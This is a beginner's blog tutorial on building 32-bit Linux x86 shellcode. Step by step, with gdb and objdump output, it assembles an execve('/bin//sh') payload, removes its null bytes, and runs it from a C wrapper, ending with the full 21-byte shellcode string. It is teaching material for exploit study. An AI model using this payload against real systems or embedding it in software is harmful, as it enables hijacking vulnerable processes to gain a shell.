Shellcode for/by a Newbie

02 Sep 2017 ~14 minutes

I wrote this blog post with a simple goal in mind: I never took the time to understand fully how a shellcode worked. I know about it, I know that it works, but I don’t know how. So I made myself write this in order to finally grasp its logic. Ready? Let’s dig in!

For this article I’m using a 32-bit Ubuntu Trusty box (with Vagrant).

The wrapper

In order to execute a shellcode, we’re going to use a simple wrapper, written in C. Later in the blog post, I’ll assume that only the shellcode changes, so I’ll only show that line.

// shellcode.c
const char shellcode[] = "/* shellcode here */";

int main() {
    (*(void (*)()) shellcode)();
    return 0;
}

Let’s study this line:

(*(void (*)()) shellcode)();

The outer (...)(); wraps an expression that evaluates to a function and calls it. We could have written it in two steps:

void (*function)() = (...);
function();

Next:

void (*)()

This is a function pointer type, used here as a cast. It’s saying:

A pointer to a function without a name, taking no specified arguments and returning no value.

And finally:

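*(...) shellcode

The cast makes the compiler treat the address of shellcode as a function pointer, and the * dereferences it, so the bytes stored in shellcode are the instructions executed when the function is called.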
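To make the one-liner easier to read, here is a small sketch that splits it into named steps. It calls an ordinary C function instead of raw bytes, so it should run on any platform; shell_fn, bump and call_at are names made up for this illustration. Converting between void * and a function pointer is not guaranteed by ISO C, but gcc on POSIX systems supports it.

```c
/* Hypothetical name: pointer to a function taking no arguments and returning nothing. */
typedef void (*shell_fn)(void);

int counter = 0;

/* Stand-in for the shellcode: a normal function whose effect we can observe. */
void bump(void)
{
    counter++;
}

/* Same steps as (*(void (*)()) shellcode)(); but spelled out one by one. */
int call_at(void *address)
{
    shell_fn fn = (shell_fn)address; /* 1. cast the address to a function pointer */
    (*fn)();                         /* 2. dereference it, 3. call it */
    return counter;
}
```

Calling call_at((void *)bump) runs bump once and returns the updated counter. The wrapper does the same thing, except that the address points at bytes we wrote ourselves.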

Let’s do a simple example:

shellcode = "\x90\x90\x90\x90";

Just 4 NOP instructions. Let’s compile and look at the result in gdb:

$ gcc -o shellcode shellcode.c
$ gdb -q ./shellcode
Reading symbols from ./shellcode...(no debugging symbols found)...done.
(gdb) disass main
Dump of assembler code for function main:
   0x080483ed <+0>:     push   %ebp
   0x080483ee <+1>:     mov    %esp,%ebp
   0x080483f0 <+3>:     and    $0xfffffff0,%esp
   0x080483f3 <+6>:     mov    $0x80484a0,%eax
   0x080483f8 <+11>:    call   *%eax
   0x080483fa <+13>:    mov    $0x0,%eax
   0x080483ff <+18>:    leave
   0x08048400 <+19>:    ret
End of assembler dump.
(gdb) x/4i 0x80484a0
   0x80484a0 <shellcode>:       nop
   0x80484a1 <shellcode+1>:     nop
   0x80484a2 <shellcode+2>:     nop
   0x80484a3 <shellcode+3>:     nop

The interesting part here is these two instructions:

   0x080483f3 <+6>:     mov    $0x80484a0,%eax
   0x080483f8 <+11>:    call   *%eax

This loads the address of our shellcode into eax and calls it: the call instruction jumps to the first instruction at that address. Don’t expect this particular shellcode to run cleanly, though: after the four NOPs the CPU keeps executing whatever bytes follow in memory. It’s only here to show the flow of the wrapper.

Spawning a shell

Our main exercise here will be to spawn a shell: a straightforward, yet powerful, way to control a machine. There are numerous techniques for getting the shellcode into memory, but that’s not our focus here; I recommend you read the reference links provided. We’ll assume that we can execute the shellcode, and we’re only interested in its underlying mechanism.

In C, there are different ways to spawn a shell. You can use the system function, e.g.:

system("/bin/sh");

Another solution is to use execve:

execve("/bin/sh", argv, envp);

We will look at execve, because it replaces the current process and is simpler than system (see differences here and here).

Execve in ASM

To call execve we will use the famous int 0x80, which transfers control to the kernel so that it executes the requested system call (c.f.).

int 0x80 expects the system call number in the eax register. To find the one we want we can run:

$ cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep execve
#define __NR_execve 11

We can already write the last two instructions of our shellcode:

...
mov eax, 0xb
int 0x80
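The same idea can be tried from C without writing any assembly. The sketch below uses glibc’s syscall() function, whose first argument plays the role of eax, together with the SYS_* constants from <sys/syscall.h>. The helper names raw_getpid and execve_number are made up for this illustration, and getpid is only used because it is harmless to call.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <unistd.h>

/* Ask the kernel for our PID by system call number, bypassing the getpid() wrapper. */
long raw_getpid(void)
{
    return syscall(SYS_getpid);
}

/* The execve system call number for the architecture this file is compiled for. */
long execve_number(void)
{
    return SYS_execve;
}
```

On the 32-bit x86 box used here, SYS_execve expands to the same 11 we found in unistd_32.h. Other architectures use different numbers, so a value copied from one machine should not be assumed to work on another.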

Now we need to study how execve works to set up its arguments correctly. Here is the function definition:

int execve(const char *filename, char *const argv[], char *const envp[]);

The first argument is a string, or as C likes to call it “a one-dimensional array of characters terminated by a null character”. The second and third arguments are null-terminated arrays of strings. argv is the list of arguments the program will receive, for example:

// execve_ls.c
#include <unistd.h>

int main() {
    char *filename = "/bin/ls";
    char *argv[3];

    argv[0] = "/bin/ls";
    argv[1] = "/";
    argv[2] = 0;
    execve(filename, argv, 0);
    return 0;
}

By convention, the first element of argv is the name of the file being executed.
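Note that execve receives no length for argv: the array simply ends at the first null pointer, which is why argv[2] = 0 matters in the example. A minimal sketch of how such an array is walked (count_args is a name made up for this illustration):

```c
#include <stddef.h>

/* Count the entries of an argv-style array: the list ends at the first NULL pointer. */
size_t count_args(char *const argv[])
{
    size_t n = 0;
    while (argv[n] != NULL)
        n++;
    return n;
}
```

For the array used in execve_ls.c this returns 2: "/bin/ls" and "/".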

$ gcc -o execve_ls execve_ls.c
$ ./execve_ls
bin dev home lib media opt root sbin sys usr var ...
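Because execve replaces the current process, the return 0 in execve_ls.c is never reached when the call succeeds. A program that wants to keep running has to fork first and call execve in the child, which is roughly what system does for you. Here is a sketch of that pattern; run_and_wait is a hypothetical helper name, and passing NULL as envp relies on Linux accepting it, as the examples in this post do.

```c
#define _POSIX_C_SOURCE 200809L
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run a program in a child process and return its exit status, or -1 on error. */
int run_and_wait(const char *path, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;                /* fork failed */
    if (pid == 0) {
        execve(path, argv, NULL); /* on success this never returns */
        _exit(127);               /* only reached if execve failed */
    }

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The shellcode in this post skips the fork on purpose: we want the vulnerable process itself to become the shell.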

Now we’re interested in /bin/sh and not /bin/ls, but it works just the same. We can actually remove argv and envp from our test:

// execve_sh.c
#include <unistd.h>

int main() {
    execve("/bin/sh", 0, 0);
    return 0;
}

$ gcc -o execve_sh execve_sh.c
$ ./execve_sh
$ exit # the new shell
$

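Note that in the following shellcode, we’ll explicitly set argv (passed in the ecx register) to 0; otherwise the kernel will try to read the argument list from whatever address ecx happens to hold, which can cause trouble. The same applies to envp, which is passed in edx: the shellcode below never touches edx, so it relies on that register already holding 0 or a valid pointer.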

Stack and register

Before going any further I need to introduce a concept: the calling convention. Depending on your kernel, the way arguments are passed to a system call may change. The two main ways of doing that are:

Pass every argument on the stack

Pass some arguments in registers (FastCall)

It’s important to know which one applies, because code written for one convention won’t work on a kernel that expects the other. The compiler usually makes that transparent for you, but because we’re writing our ASM by hand, we need to know which one works.

Simple example, using the registers to call exit (syscall 1) with the return value 1:

; exit.asm
section .text
global _start

_start:
    mov eax, 1
    mov ebx, eax
    int 0x80

$ nasm -f elf exit.asm && ld -o exit exit.o
$ ./exit
$ echo $?
1

Now with the stack:

; exit.asm
section .text
global _start

_start:
    push 1
    push 1
    int 0x80

$ nasm -f elf exit.asm && ld -o exit exit.o
$ ./exit
Segmentation fault (core dumped)

The stack version crashes: the kernel looks at the registers, not at what we pushed. So for this example we’ll use the Fastcall convention, but it can be adapted easily.

String’s address

This is an interesting part of building the shellcode. We know the string we want to reference, and we need to get its address somehow. We could store the string in the environment variables, or somewhere else in the program’s memory, but its address would be hard to predict. Instead, we want to store the string inside the shellcode.

Let’s see two techniques to do that:

Call

The call instruction is commonly used to jump to another part of the program, but in addition to that, it pushes the address of the next instruction onto the stack. To place bytes into the shellcode, we can use the db directive, which emits those bytes directly into the executable:

; call_example.asm
section .text
global _start

_start:
    jmp toCall

main:
    pop eax     ; eax now contains the string address
    ; ...

toCall:
    call main
    db "/bin/sh"

$ nasm -f elf call_example.asm
$ ld -o call_example call_example.o
$ gdb -q call_example
Reading symbols from call_example...(no debugging symbols found)...done.
(gdb) disass toCall
Dump of assembler code for function toCall:
   0x08048063 <+0>:     call   0x8048062 <main>
   0x08048068 <+5>:     das
   0x08048069 <+6>:     bound  %ebp,0x6e(%ecx)
   0x0804806c <+9>:     das
   0x0804806d <+10>:    jae    0x80480d7
End of assembler dump.
(gdb) x/s 0x08048068
0x8048068 <toCall+5>:   "/bin/sh"<error: Cannot access memory at address 0x804806f>
(gdb) disass main
Dump of assembler code for function main:
   0x08048062 <+0>:     pop    %eax
End of assembler dump.
(gdb) b *0x08048062
Breakpoint 1 at 0x8048062
(gdb) r
Starting program: /home/n4/learning/call_example
Breakpoint 1, 0x08048062 in main ()
(gdb) x/wx $esp
0xbffff74c:     0x08048068
(gdb) ni
0x08048063 in toCall ()
(gdb) x $eax
0x8048068 <toCall+5>:   0x6e69622f
(gdb) x/s $eax
0x8048068 <toCall+5>:   "/bin/sh"

Here you can see we can access the string from eax, and the strange instructions in toCall are just gdb interpreting the string as instructions:

   0x08048068 <+5>:     das
   0x08048069 <+6>:     bound  %ebp,0x6e(%ecx)
   0x0804806c <+9>:     das
   0x0804806d <+10>:    jae    0x80480d7

Push & Save ESP

Another technique is to push the string to the stack and get back the value of $esp after this operation. As you saw previously:

(gdb) x $eax
0x8048068 <toCall+5>:   0x6e69622f
(gdb) x/s $eax
0x8048068 <toCall+5>:   "/bin/sh"

Memory doesn’t hold the string as such, only the bytes that encode it. The computer doesn’t care how those bytes got there, so we can just push them directly onto the stack:

0x8048068 <toCall+5>:   "/bin/sh"
(gdb) x/2xw $eax
0x8048068 <toCall+5>:   0x6e69622f      0x0068732f

You can already see that we have a 0x00 byte here, which is never a good idea in an exploit string: it marks the end of a C string, so a string-copying function could cut the payload in half. Instead we can use //bin/sh or /bin//sh, which are both valid paths:
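To see why a null byte hurts, assume the vulnerable program copies our payload with strcpy (that is an assumption made for this sketch, not something established in this post). The copy stops at the first 0x00, so everything after it never reaches the target buffer. The function name copy_like_victim is made up for the illustration.

```c
#include <string.h>

/* Copy a payload the way a strcpy-based program would and report how many
   bytes actually arrived. dst must be large enough for the whole payload. */
size_t copy_like_victim(char *dst, const unsigned char *payload)
{
    strcpy(dst, (const char *)payload); /* stops at the first 0x00 byte */
    return strlen(dst);
}
```

For a payload starting with 6a 00 (the encoding of push 0), only a single byte survives the copy.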

(gdb) print /x "/bin//sh"
$2 = {0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, 0x0}

So our two values are 0x6e69622f ("/bin") and 0x68732f2f ("//sh"). We need to push the second one first: the stack grows toward lower addresses, so the last value pushed ends up at the lowest address, which is where the string has to start (the stack is a LIFO):

; push_example.asm
section .text
global _start

_start:
    push 0x68732f2f
    push 0x6e69622f
    mov eax, esp
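If you don’t want to work out the pushed constants by hand, the conversion is easy to script. The sketch below packs four characters into the 32-bit value that a little-endian machine such as x86 stores for them; pack_le32 is a name made up for this illustration.

```c
#include <stdint.h>

/* Pack four characters into the 32-bit value whose little-endian byte
   layout in memory spells those characters in order. */
uint32_t pack_le32(const char chunk[4])
{
    return (uint32_t)(unsigned char)chunk[0]
         | (uint32_t)(unsigned char)chunk[1] << 8
         | (uint32_t)(unsigned char)chunk[2] << 16
         | (uint32_t)(unsigned char)chunk[3] << 24;
}
```

pack_le32("/bin") gives 0x6e69622f and pack_le32("//sh") gives 0x68732f2f, the two constants pushed above. With "/sh" (three characters plus the terminator) it gives 0x0068732f, the value with the unwanted null byte.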

Once those values are on the stack, esp points to the start of the string, so we can save that address in another register. Let’s look at that under gdb:

$ nasm -f elf push_example.asm
$ ld -o push_example push_example.o
$ gdb -q push_example
Reading symbols from push_example...(no debugging symbols found)...done.
(gdb) disass _start
Dump of assembler code for function _start:
   0x08048060 <+0>:     push   $0x68732f2f
   0x08048065 <+5>:     push   $0x6e69622f
   0x0804806a <+10>:    mov    %esp,%eax
End of assembler dump.
(gdb) b *0x0804806a
Breakpoint 1 at 0x804806a
(gdb) r
Starting program: /home/n4/learning/push_example
Breakpoint 1, 0x0804806a in _start ()
(gdb) x/4wx $esp
0xbffff748:     0x6e69622f      0x68732f2f      0x00000001      0xbffff88b
(gdb) x/s $esp
0xbffff748:     "/bin//sh\001"
(gdb) ni
0x0804806c in ?? ()
(gdb) x $eax
0xbffff748:     "/bin//sh\001"

So you can see we successfully got the address of the string in $eax again.

Quick note: because the byte that follows in memory was not null (here it is the 0x00000001 that was already on the stack), it was taken as being part of the string. We’ll need to fix that later, by pushing 0 to the stack first.

Writing the shellcode

We’re going to use the second method, which is simpler and shorter to write. Shellcode usually has to fit into memory you aren’t supposed to use and are overflowing, so it’s always a good idea to keep the payload as short as possible.

Pseudo-ASM

Let’s go back to our interrupt and work backwards to what we need to have in the registers:

push 0
push string
push 0
mov ebx, string_address
mov ecx, 0
mov eax, 0xb
int 0x80

We can already replace a few instructions:

push 0
push 0x68732f2f
push 0x6e69622f
push 0
mov ebx, string_address
mov ecx, 0
mov eax, 0xb
int 0x80

Every time we push something on the stack esp changes, so we need to grab its value right after pushing the string:

; shellcode.asm
section .text
global _start

_start:
    push 0
    push 0x68732f2f
    push 0x6e69622f
    mov eax, esp
    push 0
    mov ebx, eax
    mov ecx, 0
    mov eax, 0xb
    int 0x80

And we have it! Let’s try this now:

$ nasm -f elf shellcode.asm && ld -o shellcode shellcode.o
$ ./shellcode
$ exit
$

Shellcode cleanup

Nice! Let’s have a look at our shellcode with objdump:

shellcode: file format elf32-i386
Contents of section .text:
 8048060 6a00682f 2f736868 2f62696e 89e06a00  j.h//shh/bin..j.
 8048070 89c3b900 000000b8 0b000000 cd80      ..............

That’s quite nice, but there are a few 00 in there. Let’s have a closer look:

$ objdump -d shellcode
shellcode: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
 8048060:       6a 00                   push   $0x0
 8048062:       68 2f 2f 73 68          push   $0x68732f2f
 8048067:       68 2f 62 69 6e          push   $0x6e69622f
 804806c:       89 e0                   mov    %esp,%eax
 804806e:       6a 00                   push   $0x0
 8048070:       89 c3                   mov    %eax,%ebx
 8048072:       b9 00 00 00 00          mov    $0x0,%ecx
 8048077:       b8 0b 00 00 00          mov    $0xb,%eax
 804807c:       cd 80                   int    $0x80

So we have null bytes in four places: both push $0x0 instructions, mov $0x0,%ecx and mov $0xb,%eax.

Push

We can’t have any 0 byte in the assembled code, but we have a few cards in our hand. If we make sure a register is empty, we can push its value onto the stack instead. One of the simplest ways is to use the xor instruction like so:

xor eax, eax

This XORs eax with itself and thus puts 0 into the register. We can now push it onto the stack:

xor eax, eax
push eax

We need to do the same for the other push 0, but we have a problem: our code overwrites eax with esp in between, so eax no longer holds 0 and we can’t simply push it again.

If you look closely you can see that we can optimize our shellcode while solving this problem:

mov eax, esp
push 0
mov ebx, eax

Is changed to:

mov ebx, esp
push eax

We never really needed to move esp to eax if it was only to move it to ebx later. And since eax is left untouched, it still holds 0 for the second push. Shorter code!

Mov

Firstly, we want to set ecx to 0; the easiest way is to xor it with itself, as we saw previously.

Now we want to set eax to 11, but mov eax, 11 writes the full 4 bytes of the register, so the instruction has to encode all 4 bytes of the value (see the three 00 after the single 0b).

We could inc eax 11 times, but that would be really long!

Instead we can use the al register, which is the lowest 8 bits of the eax register:

64              32      16   8  0
                         [AH][AL]
                [      EAX      ]
[              RAX              ]

Since xor eax, eax has already cleared the upper bits of eax, we can just replace

mov eax, 11

with

mov al, 11
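Writing to al leaves the other 24 bits of eax alone, which is why the register has to be zeroed first. A tiny C model of that behaviour (the function name mov_al is made up, and the register is just an integer here):

```c
#include <stdint.h>

/* Model of `mov al, value`: only the lowest 8 bits of the 32-bit register change. */
uint32_t mov_al(uint32_t eax, uint8_t value)
{
    return (eax & 0xFFFFFF00u) | value;
}
```

mov_al(0, 0x0b) gives 0x0000000b, the execve number we want. Starting from a dirty register such as 0xdeadbeef it gives 0xdeadbe0b, which the kernel would not recognise as execve.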

And here’s the final payload:

section .text
global _start

_start:
    xor eax, eax
    push eax
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    xor ecx, ecx
    mov al, 0xb
    int 0x80

It’s a little bit shorter than the previous one, but the real gain shows when you look at the generated shellcode:

$ objdump -s shellcode
shellcode: file format elf32-i386
Contents of section .text:
 8048060 31c05068 2f2f7368 682f6269 6e89e331  1.Ph//shh/bin..1
 8048070 c9b00bcd 80                          .....
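Rather than scanning the dump by eye, the check can be automated. The sketch below counts the 0x00 bytes in both versions; the byte arrays are copied from the two objdump -s outputs in this post, and count_null_bytes, first_version and final_version are names made up for the illustration.

```c
#include <stddef.h>

/* Count how many 0x00 bytes a piece of shellcode contains. */
size_t count_null_bytes(const unsigned char *code, size_t len)
{
    size_t count = 0;
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            count++;
    return count;
}

/* Bytes of the first attempt, as dumped before the cleanup. */
const unsigned char first_version[] = {
    0x6a, 0x00, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62,
    0x69, 0x6e, 0x89, 0xe0, 0x6a, 0x00, 0x89, 0xc3, 0xb9, 0x00,
    0x00, 0x00, 0x00, 0xb8, 0x0b, 0x00, 0x00, 0x00, 0xcd, 0x80
};

/* Bytes of the final payload. */
const unsigned char final_version[] = {
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f,
    0x62, 0x69, 0x6e, 0x89, 0xe3, 0x31, 0xc9, 0xb0, 0x0b, 0xcd,
    0x80
};
```

The first version is 30 bytes long with 9 null bytes; the final one is 21 bytes long with none.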

Wrapping up

We have our hex instructions, let’s put that in our wrapper. Here’s a swift way to convert your hex string to the proper format with vim:

31c050682f2f7368682f62696e89e331c9b00bcd80
:s/\(..\)/\\x\1/g
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80
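If vim isn’t at hand, the same rewrite is a few lines of C. This is only a sketch of the substitution above: hex_to_escaped is a made-up name, it does not validate that the characters are hex digits, and the caller has to provide an output buffer of at least 2 * strlen(hex) + 1 bytes.

```c
#include <stddef.h>
#include <string.h>

/* Rewrite "31c0..." as "\x31\xc0...".
   Returns 0 on success, -1 if the input has an odd number of characters. */
int hex_to_escaped(const char *hex, char *out)
{
    size_t len = strlen(hex);
    if (len % 2 != 0)
        return -1;

    for (size_t i = 0; i < len; i += 2) {
        *out++ = '\\';
        *out++ = 'x';
        *out++ = hex[i];
        *out++ = hex[i + 1];
    }
    *out = '\0';
    return 0;
}
```

Feeding it the 42-character hex string above fills the buffer with the 84-character escaped form, ready to paste into the wrapper.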

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80";

$ gcc -o shellcode shellcode.c
$ ./shellcode
$ # new shell

References: